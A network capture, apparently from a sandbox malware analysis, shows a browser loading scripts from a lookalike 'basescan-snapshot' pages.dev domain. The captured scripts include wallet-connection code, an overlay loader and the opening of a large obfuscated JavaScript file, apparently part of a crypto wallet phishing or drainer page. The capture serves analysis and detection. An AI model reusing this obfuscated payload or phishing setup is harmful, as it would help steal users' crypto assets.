                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 5b 5d 3a 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 29 3b 72 65 74 75 72 6e 20 44 36 28 61 2c 21 30 29 2c 69 2e 73 65 74 28 65 2c 5b 74 2c 61 5d 29 2c 52 65 66 6c 65 63 74 2e 6f 77 6e 4b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 61 2c 74 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6e 3d 52 65 66 6c 65 63 74 2e 67 65 74 28 65 2c 74 29 2c 69 3d 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 3b 69 66 28 62 64 2e 68 61 73 28 6e 29 29 44 36 28 6e 2c 21 31 29 3b 65 6c 73 65 20 69 66 28 6e 20 69 6e 73
                                                                                                                                                                                                                                              Data Ascii: []:Object.create(Object.getPrototypeOf(e));return D6(a,!0),i.set(e,[t,a]),Reflect.ownKeys(e).forEach((t=>{if(Object.getOwnPropertyDescriptor(a,t))return;const n=Reflect.get(e,t),i={value:n,enumerable:!0,configurable:!0};if(bd.has(n))D6(n,!1);else if(n ins
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 20 70 2e 73 65 74 28 65 2c 5b 74 5d 29 7d 29 28 6e 2c 65 29 7d 72 65 74 75 72 6e 20 52 65 66 6c 65 63 74 2e 73 65 74 28 74 2c 6e 2c 64 2c 6f 29 2c 68 28 5b 22 73 65 74 22 2c 5b 6e 5d 2c 69 2c 6c 5d 29 2c 21 30 7d 7d 29 3b 73 2e 73 65 74 28 6e 2c 76 29 3b 63 6f 6e 73 74 20 79 3d 5b 6d 2c 28 65 3d 2b 2b 61 5b 31 5d 29 3d 3e 28 64 21 3d 3d 65 26 26 21 75 2e 73 69 7a 65 26 26 28 64 3d 65 2c 70 2e 66 6f 72 45 61 63 68 28 28 28 5b 74 5d 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 74 5b 31 5d 28 65 29 3b 72 3e 6c 26 26 28 6c 3d 72 29 7d 29 29 29 2c 6c 29 2c 6f 2c 65 3d 3e 28 75 2e 61 64 64 28 65 29 2c 31 3d 3d 3d 75 2e 73 69 7a 65 26 26 70 2e 66 6f 72 45 61 63 68 28 28 28 5b 65 2c 74 5d 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 65 5b 33 5d 28 66 28 72 29 29 3b 70 2e 73
                                                                                                                                                                                                                                              Data Ascii: p.set(e,[t])})(n,e)}return Reflect.set(t,n,d,o),h(["set",[n],i,l]),!0}});s.set(n,v);const y=[m,(e=++a[1])=>(d!==e&&!u.size&&(d=e,p.forEach((([t])=>{const r=t[1](e);r>l&&(l=r)}))),l),o,e=>(u.add(e),1===u.size&&p.forEach((([e,t],r)=>{const n=e[3](f(r));p.s
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 70 72 6f 74 6f 74 79 70 65 7d 65 6c 73 65 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 74 2c 6e 2e 67 65 74 3f 6e 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 7d 7d 29 7d 29 29 2c 72 7d 63 6f 6e 73 74 20 77 64 3d 7b 46 4f 55 52 5f 4d
                                                                                                                                                                                                                                              Data Ascii: prototype}else r={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.keys(e).forEach((function(t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(r,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})})),r}const wd={FOUR_M
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 55 72 6c 28 65 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 6d 61 74 55 6e 69 76 65 72 73 61 6c 55 72 6c 28 65 2c 74 29 3b 6c 65 74 20 72 3d 65 3b 72 2e 69 6e 63 6c 75 64 65 73 28 22 3a 2f 2f 22 29 7c 7c 28 72 3d 65 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 2f 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 3a 22 2c 22 22 29 2c 72 3d 60 24 7b 72 7d 3a 2f 2f 60 29 2c 72 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 7c 7c 28 72 3d 60 24 7b 72 7d 2f 60 29 3b 72 65 74 75 72 6e 7b 72 65 64 69 72 65 63 74 3a 60 24 7b 72 7d 77 63 3f 75 72 69 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 7d 60 2c 68 72 65 66 3a 72 7d 7d 2c 66 6f 72 6d 61 74 55 6e 69 76 65 72 73 61 6c 55 72 6c 28 65 2c 74 29 7b 69 66 28 21 70 74 2e 69 73 48 74 74 70
                                                                                                                                                                                                                                              Data Ascii: Url(e))return this.formatUniversalUrl(e,t);let r=e;r.includes("://")||(r=e.replaceAll("/","").replaceAll(":",""),r=`${r}://`),r.endsWith("/")||(r=`${r}/`);return{redirect:`${r}wc?uri=${encodeURIComponent(t)}`,href:r}},formatUniversalUrl(e,t){if(!pt.isHttp
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 75 2c 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 3b 72 65 74 75 72 6e 28 22 78 22 3d 3d 3d 65 3f 74 3a 33 26 74 7c 38 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 7d 29 29 7d 2c 6c 6e 3d 71 69 28 7b 69 73 43 6f 6e 6e 65 63 74 65 64 3a 21 31 7d 29 2c 52 72 3d 7b 73 74 61 74 65 3a 6c 6e 2c 73 75 62 73 63 72 69 62 65 3a 65 3d 3e 65 75 28 6c 6e 2c 28 28 29 3d 3e 65 28 6c 6e 29 29 29 2c 73 75 62 73 63 72 69 62 65 4b 65 79 3a 28 65 2c 74 29 3d 3e 79 6f 28 6c 6e 2c 65 2c 74 29 2c 73 65 74 49 73 43 6f 6e 6e 65 63 74 65 64 28 65 29 7b 6c 6e 2e 69 73 43 6f 6e 6e 65 63 74
                                                                                                                                                                                                                                              Data Ascii: xxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/gu,(e=>{const t=16*Math.random()|0;return("x"===e?t:3&t|8).toString(16)}))},ln=qi({isConnected:!1}),Rr={state:ln,subscribe:e=>eu(ln,(()=>e(ln))),subscribeKey:(e,t)=>yo(ln,e,t),setIsConnected(e){ln.isConnect
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 45 54 45 22 2c 68 65 61 64 65 72 73 3a 74 2c 62 6f 64 79 3a 65 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 76 6f 69 64 20 30 7d 29 29 2e 6a 73 6f 6e 28 29 7d 63 72 65 61 74 65 55 72 6c 28 7b 70 61 74 68 3a 65 2c 70 61 72 61 6d 73 3a 74 7d 29 7b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 55 52 4c 28 65 2c 74 68 69 73 2e 62 61 73 65 55 72 6c 29 3b 72 65 74 75 72 6e 20 74 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 28 5b 65 2c 74 5d 29 3d 3e 7b 74 26 26 72 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 61 70 70 65 6e 64 28 65 2c 74 29 7d 29 29 2c 72 7d 7d 63 6f 6e 73 74 20 63 77 3d 22 57 41 4c 4c 45 54 43 4f 4e 4e 45 43 54 5f 44 45 45 50 4c 49 4e 4b 5f 43 48 4f 49 43 45 22 2c 24 36 3d 22 40 77 33 6d 2f 72 65 63 65
                                                                                                                                                                                                                                              Data Ascii: ETE",headers:t,body:e?JSON.stringify(e):void 0})).json()}createUrl({path:e,params:t}){const r=new URL(e,this.baseUrl);return t&&Object.entries(t).forEach((([e,t])=>{t&&r.searchParams.append(e,t)})),r}}const cw="WALLETCONNECT_DEEPLINK_CHOICE",$6="@w3m/rece
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 61 6c 6c 65 74 49 6d 61 67 65 73 3a 7b 7d 2c 6e 65 74 77 6f 72 6b 49 6d 61 67 65 73 3a 7b 7d 2c 63 6f 6e 6e 65 63 74 6f 72 49 6d 61 67 65 73 3a 7b 7d 2c 74 6f 6b 65 6e 49 6d 61 67 65 73 3a 7b 7d 7d 29 2c 43 63 3d 7b 73 74 61 74 65 3a 6c 63 2c 73 75 62 73 63 72 69 62 65 4e 65 74 77 6f 72 6b 49 6d 61 67 65 73 3a 65 3d 3e 65 75 28 6c 63 2e 6e 65 74 77 6f 72 6b 49 6d 61 67 65 73 2c 28 28 29 3d 3e 65 28 6c 63 2e 6e 65 74 77 6f 72 6b 49 6d 61 67 65 73 29 29 29 2c 73 75 62 73 63 72 69 62 65 4b 65 79 3a 28 65 2c 74 29 3d 3e 79 6f 28 6c 63 2c 65 2c 74 29 2c 73 65 74 57 61 6c 6c 65 74 49 6d 61 67 65 28 65 2c 74 29 7b 6c 63 2e 77 61 6c 6c 65 74 49 6d 61 67 65 73 5b 65 5d 3d 74 7d 2c 73 65 74 4e 65 74 77 6f 72 6b 49 6d 61 67 65 28 65 2c 74 29 7b 6c 63 2e 6e 65 74 77
                                                                                                                                                                                                                                              Data Ascii: alletImages:{},networkImages:{},connectorImages:{},tokenImages:{}}),Cc={state:lc,subscribeNetworkImages:e=>eu(lc.networkImages,(()=>e(lc.networkImages))),subscribeKey:(e,t)=>yo(lc,e,t),setWalletImage(e,t){lc.walletImages[e]=t},setNetworkImage(e,t){lc.netw
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 73 77 69 74 63 68 41 63 74 69 76 65 4e 65 74 77 6f 72 6b 28 65 29 7b 61 77 61 69 74 20 74 68 69 73 2e 5f 67 65 74 43 6c 69 65 6e 74 28 29 2e 73 77 69 74 63 68 43 61 69 70 4e 65 74 77 6f 72 6b 28 65 29 2c 59 6e 2e 63 61 69 70 4e 65 74 77 6f 72 6b 3d 65 7d 2c 72 65 73 65 74 4e 65 74 77 6f 72 6b 28 29 7b 59 6e 2e 69 73 44 65 66 61 75 6c 74 43 61 69 70 4e 65 74 77 6f 72 6b 7c 7c 28 59 6e 2e 63 61 69 70 4e 65 74 77 6f 72 6b 3d 76 6f 69 64 20 30 29 2c 59 6e 2e 61 70 70 72 6f 76 65 64 43 61 69 70 4e 65 74 77 6f 72 6b 49 64 73 3d 76 6f 69 64 20 30 2c 59 6e 2e 73 75 70 70 6f 72 74 73 41 6c 6c 4e 65 74 77 6f 72 6b 73 3d 21 30 7d 7d 2c 65 73 3d 71 69 28 7b 70 72 6f 6a 65 63 74 49 64 3a 22 22 2c 73 64 6b 54 79 70 65 3a 22 77 33 6d 22 2c 73 64 6b 56 65 72 73 69 6f 6e
                                                                                                                                                                                                                                              Data Ascii: switchActiveNetwork(e){await this._getClient().switchCaipNetwork(e),Yn.caipNetwork=e},resetNetwork(){Yn.isDefaultCaipNetwork||(Yn.caipNetwork=void 0),Yn.approvedCaipNetworkIds=void 0,Yn.supportsAllNetworks=!0}},es=qi({projectId:"",sdkType:"w3m",sdkVersion


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              15192.168.2.549737172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC628OUTGET /config.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC801INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 744
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "44dd3986f147bfcb15de97b6edd1e47b"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=deHEn%2BV5q%2BOj8m%2FK%2Bs9P63e5aM%2BWZt7kb7%2BnUsOgU8qySCQj83V12WHgo%2FEaRv8%2BC7QaS5ObT53dnlYIFS3TxKvJc3c25tRY3WpYYjpE0c7Zgkq5Oz3lpghTVTDRMvZr4jJgw3MCYsDNTFtdUTgHzRvYEOaDfGVdAjK5KqJVuf5oviWaYkR0mQJ3oWsLyPPUzUXohvQq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2b3bd94c329-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC568INData Raw: 63 6f 6e 73 74 20 77 65 62 73 69 74 65 55 72 6c 20 3d 20 22 2f 64 69 73 74 2f 77 65 62 73 69 74 65 2e 68 74 6d 6c 22 3b 0d 0a 63 6f 6e 73 74 20 6f 76 65 72 6c 61 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6f 76 65 72 6c 61 79 22 29 3b 0d 0a 63 6f 6e 73 74 20 6f 76 65 72 6c 61 79 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6f 76 65 72 6c 61 79 42 75 74 74 6f 6e 22 29 3b 0d 0a 63 6f 6e 73 74 20 77 65 62 73 69 74 65 46 72 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 77 65 62 73 69 74 65 46 72 61 6d 65 22 29 3b 0d 0a 0d 0a 77 65 62 73 69 74 65 46 72 61 6d 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28
                                                                                                                                                                                                                                              Data Ascii: const websiteUrl = "/dist/website.html";const overlay = document.getElementById("overlay");const overlayButton = document.getElementById("overlayButton");const websiteFrame = document.getElementById("websiteFrame");websiteFrame.addEventListener(
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC176INData Raw: 68 61 6e 67 65 20 74 6f 20 27 66 6c 65 78 27 2c 20 27 67 72 69 64 27 2c 20 65 74 63 2e 20 69 66 20 6e 65 65 64 65 64 0d 0a 7d 0d 0a 0d 0a 2f 2f 20 43 61 6c 6c 20 74 68 65 20 66 75 6e 63 74 69 6f 6e 20 61 66 74 65 72 20 61 20 63 65 72 74 61 69 6e 20 64 65 6c 61 79 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 73 68 6f 77 48 69 64 64 65 6e 44 69 76 2c 20 33 30 30 30 29 3b 20 2f 2f 20 43 68 61 6e 67 65 20 33 30 30 30 20 74 6f 20 74 68 65 20 64 65 73 69 72 65 64 20 64 65 6c 61 79 20 69 6e 20 6d 69 6c 6c 69 73 65 63 6f 6e 64 73 0d 0a
                                                                                                                                                                                                                                              Data Ascii: hange to 'flex', 'grid', etc. if needed}// Call the function after a certain delaysetTimeout(showHiddenDiv, 3000); // Change 3000 to the desired delay in milliseconds


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              16192.168.2.549738172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC639OUTGET /z0emk-akw98-t47wk.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC799INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 2322573
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "cc5ca23803b0882f44541c6a0461b91d"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SmMtsedZ75L2V7iM1pBdQbHS6U8rYKiJZRzk0rM2oV11fJWgl8G2UPf1lFXy3blA%2F6g7O7nbDpBP6fk%2FglB%2B6JZSKqfwGaWKWz18L8DHqsINZLoZ4NkLkRQ%2FaEicfhIuBVky4Ree6lA8VTKTu483Z70IkcAVh3xFolyoYU%2Fd08f1dykB8UtIxlAaSrjCzBCXrgiilUP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2b399eb443e-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC570INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 66 33 36 66 2c 5f 30 78 32 65 38 31 62 31 29 7b 63 6f 6e 73 74 20 5f 30 78 35 38 64 30 62 37 3d 5f 30 78 31 33 66 33 36 66 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 63 37 32 38 31 28 5f 30 78 32 38 37 64 32 65 2c 5f 30 78 32 33 33 33 61 62 2c 5f 30 78 32 32 37 30 31 33 2c 5f 30 78 32 35 36 66 62 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 65 33 28 5f 30 78 32 35 36 66 62 66 2d 30 78 39 37 2c 5f 30 78 32 38 37 64 32 65 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 63 61 38 65 28 5f 30 78 65 62 33 32 39 62 2c 5f 30 78 63 35 63 39 31 2c 5f 30 78 35 30 61 61 38 37 2c 5f 30 78 32 32 35 38 62 39 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 65 33 28 5f 30 78 35 30 61 61 38 37 2d 20 2d 30 78 31 39 61 2c 5f 30
                                                                                                                                                                                                                                              Data Ascii: (function(_0x13f36f,_0x2e81b1){const _0x58d0b7=_0x13f36f();function _0x5c7281(_0x287d2e,_0x2333ab,_0x227013,_0x256fbf){return _0x16e3(_0x256fbf-0x97,_0x287d2e);}function _0x3eca8e(_0xeb329b,_0xc5c91,_0x50aa87,_0x2258b9){return _0x16e3(_0x50aa87- -0x19a,_0
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 78 35 2a 2d 30 78 32 32 37 2b 2d 30 78 32 2a 30 78 64 63 34 2b 30 78 31 30 63 39 2a 30 78 31 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 32 38 31 28 30 78 31 62 61 34 2c 30 78 31 35 38 66 2c 30 78 31 35 30 36 2c 30 78 31 36 65 65 29 29 2f 28 2d 30 78 31 33 2a 30 78 31 38 37 2b 2d 30 78 31 63 36 2a 2d 30 78 32 2b 2d 30 78 64 2a 2d 30 78 31 66 36 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 32 38 31 28 30 78 64 65 36 2c 30 78 31 37 66 34 2c 30 78 31 62 65 34 2c 30 78 31 35 36 36 29 29 2f 28 2d 30 78 66 37 64 2b 2d 30 78 32 61 36 2a 30 78 31 2b 30 78 31 32 32 39 2a 30 78 31 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 63 61 38 65 28 30 78 31 31 64 31 2c 30 78 66 34 36 2c 30 78 65 31 39 2c 30 78 36 65 37 29 29 2f 28 30 78 62 36 39 2a 2d
                                                                                                                                                                                                                                              Data Ascii: x5*-0x227+-0x2*0xdc4+0x10c9*0x1))+-parseInt(_0x5c7281(0x1ba4,0x158f,0x1506,0x16ee))/(-0x13*0x187+-0x1c6*-0x2+-0xd*-0x1f6)+parseInt(_0x5c7281(0xde6,0x17f4,0x1be4,0x1566))/(-0xf7d+-0x2a6*0x1+0x1229*0x1)+parseInt(_0x3eca8e(0x11d1,0xf46,0xe19,0x6e7))/(0xb69*-
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 2d 30 78 31 37 61 2c 5f 30 78 32 38 63 64 65 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 33 63 35 33 37 28 5f 30 78 34 61 32 39 36 31 2c 5f 30 78 31 36 63 61 62 33 2c 5f 30 78 33 30 33 30 35 30 2c 5f 30 78 38 30 61 34 61 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 65 33 28 5f 30 78 38 30 61 34 61 32 2d 20 2d 30 78 61 64 2c 5f 30 78 31 36 63 61 62 33 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 61 33 37 39 61 33 5b 5f 30 78 31 33 63 35 33 37 28 30 78 63 35 37 2c 2d 30 78 33 63 34 2c 2d 30 78 32 65 34 2c 30 78 32 31 61 29 5d 28 29 5b 5f 30 78 31 39 31 33 64 36 28 30 78 31 61 33 39 2c 30 78 31 61 30 63 2c 30 78 31 31 61 35 2c 30 78 31 36 62 63 29 5d 28 5f 30 78 31 33 63 35 33 37 28 30 78 31 65 32 35 2c 30 78 61 65 63 2c 30 78 31 61 34 65 2c 30 78 31 34 37
                                                                                                                                                                                                                                              Data Ascii: -0x17a,_0x28cded);}function _0x13c537(_0x4a2961,_0x16cab3,_0x303050,_0x80a4a2){return _0x16e3(_0x80a4a2- -0xad,_0x16cab3);}return _0xa379a3[_0x13c537(0xc57,-0x3c4,-0x2e4,0x21a)]()[_0x1913d6(0x1a39,0x1a0c,0x11a5,0x16bc)](_0x13c537(0x1e25,0xaec,0x1a4e,0x147
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 46 44 65 56 27 3a 27 69 6e 69 74 27 2c 27 7a 6d 76 6e 42 27 3a 5f 30 78 33 61 63 32 38 65 28 2d 30 78 36 30 64 2c 30 78 66 31 2c 2d 30 78 33 38 61 2c 2d 30 78 31 62 31 29 2c 27 68 66 42 79 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 64 30 61 35 2c 5f 30 78 32 64 36 62 30 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 66 64 30 61 35 2b 5f 30 78 32 64 36 62 30 37 3b 7d 2c 27 51 44 78 7a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 35 34 32 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 35 34 32 31 28 29 3b 7d 2c 27 46 52 53 6f 76 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 34 66 65 61 39 2c 5f 30 78 33 61 36 65 37 37 2c 5f 30 78 33 31 63 30 36 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 34 66 65 61 39 28 5f 30 78 33 61 36 65 37 37 2c 5f 30 78 33 31 63
                                                                                                                                                                                                                                              Data Ascii: FDeV':'init','zmvnB':_0x3ac28e(-0x60d,0xf1,-0x38a,-0x1b1),'hfBye':function(_0x3fd0a5,_0x2d6b07){return _0x3fd0a5+_0x2d6b07;},'QDxzi':function(_0x455421){return _0x455421();},'FRSov':function(_0x54fea9,_0x3a6e77,_0x31c06a){return _0x54fea9(_0x3a6e77,_0x31c
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 36 61 29 7b 63 6f 6e 73 74 20 5f 30 78 34 38 30 65 66 66 3d 5f 30 78 34 32 66 62 36 61 5b 5f 30 78 31 63 61 62 33 34 28 2d 30 78 35 36 65 2c 30 78 32 33 61 2c 30 78 63 32 31 2c 30 78 33 33 39 29 5d 28 5f 30 78 34 65 63 31 34 35 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 32 66 62 36 61 3d 6e 75 6c 6c 2c 5f 30 78 34 38 30 65 66 66 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 37 36 38 61 33 36 3d 21 5b 5d 2c 5f 30 78 34 39 35 62 65 66 3b 7d 3b 7d 28 29 29 2c 5f 30 78 35 34 64 36 36 65 3d 5f 30 78 34 37 38 64 35 35 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 36 61 36 66 3d 7b 7d 3b 5f 30 78 32 31 36 61 36 66 5b 5f 30 78 39 62 38 64 32 32 28 2d 30 78 62 30 2c
                                                                                                                                                                                                                                              Data Ascii: 6a){const _0x480eff=_0x42fb6a[_0x1cab34(-0x56e,0x23a,0xc21,0x339)](_0x4ec145,arguments);return _0x42fb6a=null,_0x480eff;}}:function(){};return _0x768a36=![],_0x495bef;};}()),_0x54d66e=_0x478d55(this,function(){const _0x216a6f={};_0x216a6f[_0x9b8d22(-0xb0,
